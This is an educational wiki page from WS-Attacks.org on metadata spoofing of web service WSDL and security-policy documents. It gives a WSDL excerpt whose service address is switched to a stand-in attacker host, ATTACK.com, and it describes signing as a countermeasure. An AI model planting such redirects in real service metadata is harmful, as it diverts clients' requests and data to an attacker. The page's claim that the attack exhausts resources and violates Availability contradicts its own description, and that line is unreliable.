Metadata Spoofing

From WS-Attacks.org
(Redirected from WS Security Policy Spoofing)
Jump to: navigation, search

Contents

Attack description

Before a web service client can communicate with other web services, the web service client has to retrieve information on how to invoke the the desired web service. That means data such as web service address, message format, required parameters or security requirements. All of this data is found in the metadata documents provided by the invoked web services server. The most common meta data documents are:

  • WSDL file[
  • WS-Security-Policy

When an attacker is able to maliciously alter these documents and spread them across web service clients, this attack is called Metadata Spoofing or Schema Poisoning.


Attack subtypes

The most common spoofing attacks are:

  • WSDL Spoofing
    Maliciously changing the content of the WSDL file. This attack is also known as WSDL Parameter Tampering.
  • WS Security Policy Spoofing
    Maliciously changing the content of the WSDL file. This usually aims at lowering the security requirements of an web service. I.e. the information that certain message data is required to be encrypted just gets removed, resulting in an unencrypted communication between web services, enabling the attacker to read the message content.


Prerequisites for attack

In order for this attack to work the attack has to have knowledge about the following thinks:

  1. Attacker has access to the documents he wants to spoof.
  2. Attacker is able to spread the spoof documents across web service clients that want to invoke the attacked web service.


Graphical representation of attack

The attack is executed on the web service client. The web service intended to be invoked by the attacked web service client doesn't even have to be vulnerable to any attack.

We just assume that an attacker is able to spoof the metadata documents of the web service the client wants to invoke. For an attacker three scenarios are possible in order to achieve his goal

  1. Swapping of the original file on the attacked web service server with the spoofed file.
  2. MITM scenarios, where an attacker alters the document in traffic, while the client retrieves the metadata document from the web services server.
  3. The attacker swaps the file on the local machine of the web service client. Local access on the clients machine is required.

In this scenario the reciving web service and the executed operation on the web service are as specified by the attacker in the spoofed document.

AttackedComponent Metadata.png

  • Red = attacked web service component
  • Black = location of attacker
  • Blue = web service component not directly involved in attack.


Attack example

Listing 1 contains a WSDL example [1] with a network address. Therefore all requests get forwarded to the web service located at the new network address specified by the attacker.

<!-- excerpt of WSDL FILE [http://www.w3.org/2001/03/14-annotated-WSDL-examples.html]-->
    <!-- wsdl:service names a new service "StockQuoteService" -->
    <wsdl:service name="StockQuoteService">
        <wsdl:documentation>My first service</documentation>

        <!-- connect it to the binding "StockQuoteBinding" above -->
        <wsdl:port name="StockQuotePort"
                   binding="tns:StockQuoteBinding">

           <!-- give the binding an network address -->
           <!-- THE LOCATION WAS CHANGED FROM examples.com to ATTACK.com -->
           <soap:address location="http://ATTACK.com/stockquote"/>
        </wsdl:port>
    </wsdl:service>

</wsdl:definitions>

Listing 1: Modified WSDL Document

Attack mitigation / countermeasures

As an web service client, it is important to check all metadata documents for authenticity prior to employing them. Up to now, no standardised method is defined to check for authenticity. Therefore web service developers still have to define proprietary solutions like signing of the metadata documents.


Attack categorisation

Categorisation by violated security objective

The attack aims at exhausting the system resources, therefore it violates the security objective Availability.


Categorisation by number of involved parties


Categorisation by attacked component in web service architecture


Categorisation by attack spreading


References

  1. Meiko Jensen, Nils Gruschka, and Ralph Herkenh ╠łner. A survey of attacks on web services. Springer-Verlag, 2009.
  2. Meiko Jensen.Attacking webservices. http://www.nds.rub.de/media/nds/downloads/ws0910/AttackingWebServices.pdf, 2010. Accessed 01 July 2010.
Personal tools